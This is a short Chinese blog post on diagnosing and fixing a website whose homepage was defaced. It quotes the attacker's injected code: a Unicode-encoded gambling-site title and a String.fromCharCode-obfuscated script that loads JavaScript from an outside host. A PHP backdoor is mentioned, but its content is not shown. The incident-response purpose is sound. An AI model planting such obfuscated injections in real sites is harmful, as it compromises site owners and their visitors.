黑客攻击网站,篡改首页问题排查修复

sunphp开发者2024-12-27 8:28

1,修改首页,并植入js

标题通过unicode编码,隐藏了

<title>&#24320;&#20113;&#40;&#20013;&#22269;&#41;&#75;&#97;&#105;&#121;&#117;&#110;&#183;&#23448;

js文件通过String.fromCharCode隐藏起来了

<script type="text/javascript"> var xt = String.fromCharCode(0,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,120,106,115,56,56,50,46,99,111,109,47,121,98,46,106,115,34,62,60, 47,115, 99,114,105,112,116,62); document.write(xt);

2,加入php后门

解码后在实际攻击内容如下

相关推荐
峥嵘life6 分钟前
Android getprop 属性限制详解:User 版本属性获取问题分析
android·开发语言·python·学习
一航jason1 小时前
Speed Tools:一套低侵入的 Android 插件化 + 动态换肤 + 字体切换框架
android·插件化·组件化·换肤
李斯维2 小时前
Jetpack 可观察数据容器 LiveData 的入门与基础使用
android·android jetpack
问心无愧05133 小时前
ctf show web入门261
android·前端·笔记
alexhilton3 小时前
车载系统中的可扩展UI:从UI嵌入到系统窗口编排
android·kotlin·android jetpack
Cloud_Shy6183 小时前
解读《Effective Python 3rd Edition》:从练气到老魔(第一章 Item 4 - 6)
android·数据库·论文阅读·python
therese_100863 小时前
安卓面试题
android
码云骑士3 小时前
Android Launcher启动过程
android
Java面试题总结4 小时前
MySQL EXISTS 详解:存在性判断、NOT EXISTS 与实战示例
android·数据库·mysql
_李小白5 小时前
【android opencv学习笔记】Day 30: 滤波算法之拉普拉斯算子
android·opencv·学习
热门推荐
01GitHub 镜像站点02【AI】2026 年具身智能模型和世界模型总结03DeepSeek V4 + Claude Code thinking mode 400 错误修复方案04【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法05Codex 接入 DeepSeek API 完整配置文档06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07几个好用的ip纯净度检测网站08CC-Switch & Claude 基于 Linux 服务器安装使用指南09CC-Switch 全平台下载、安装与使用全指南(Windows/macOS/Linux)10API Key 登录 Codex 也能用插件了,还支持会话删除和导出